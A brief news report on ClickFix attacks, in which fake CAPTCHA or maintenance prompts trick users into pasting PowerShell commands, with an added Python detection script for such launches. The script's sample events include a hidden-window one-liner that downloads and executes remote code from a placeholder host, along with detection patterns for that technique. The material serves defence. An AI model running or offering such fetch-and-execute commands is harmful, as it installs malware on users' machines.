Hackers Lure Victims With Fake Prompts in ClickFix Attacks

Hackers are deploying a new social engineering tactic known as “ClickFix” to exploit human error by mimicking routine computer prompts, cybersecurity researchers warned. First observed in March 2024, the method disguises malicious activity as legitimate system messages—such as CAPTCHA verifications or maintenance alerts—tricking users into executing harmful PowerShell commands.

The technique has been linked to threat actors including APT28 and MuddyWater, with attacks spanning sectors from healthcare to government. Analysts at Darktrace have identified ClickFix campaigns across the U.S., Europe, Middle East and Africa. These attacks often begin with spear phishing emails or compromised websites, redirecting users to fake prompts instructing them to run malicious code.

Once triggered, the malware establishes command-and-control channels, enabling data exfiltration and network traversal. Payloads often include variants of XWorm, Lumma, and AsyncRAT. The attack chain leverages user trust in system functions, highlighting the ongoing vulnerability at the intersection of human behavior and cybersecurity.
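Detection logic for the step where the user runs the pasted command, as an added example (not from the article or from Darktrace). It assumes process-creation events shaped like Sysmon Event ID 1 (`Image`, `ParentImage`, `CommandLine`) and assumes the command is pasted into the Run dialog, so PowerShell's parent is `explorer.exe`; the sample events and the trait list are constructed for illustration.

```python
import re

# Assumption (not stated in the article): the fake prompt has the user paste the
# command into the Windows Run dialog, so the shell's parent is explorer.exe.
SHELLS = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line traits of pasted one-liners; an event is scored by how many match.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "lure_text": re.compile(r"(?:captcha|verif|not a robot)", re.I),
}

# Constructed sample events (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/v)" # CAPTCHA verification'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Agent\agent.exe",
     "CommandLine": 'powershell.exe -c "iex (irm https://example.invalid/agent-update)"'},
]

def basename(path):
    # Lower-cased file name of a Windows path.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the names of matched traits, or [] if the event is out of scope."""
    if basename(event.get("Image", "")) not in SHELLS:
        return []
    if basename(event.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in TRAITS.items() if rx.search(cmd)]

def triage(events, threshold=2):
    """Return (event, traits) pairs for events matching at least `threshold` traits."""
    return [(e, t) for e in events if len(t := score_event(e)) >= threshold]

if __name__ == "__main__":
    for event, traits in triage(SAMPLE_EVENTS):
        print(traits, "|", event["CommandLine"])
```

Requiring two traits keeps a user-launched maintenance script (second sample) out of the results; the third sample is skipped because its parent is not an interactive shell, which is the scoping assumption to revisit if the command is pasted into a terminal instead.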
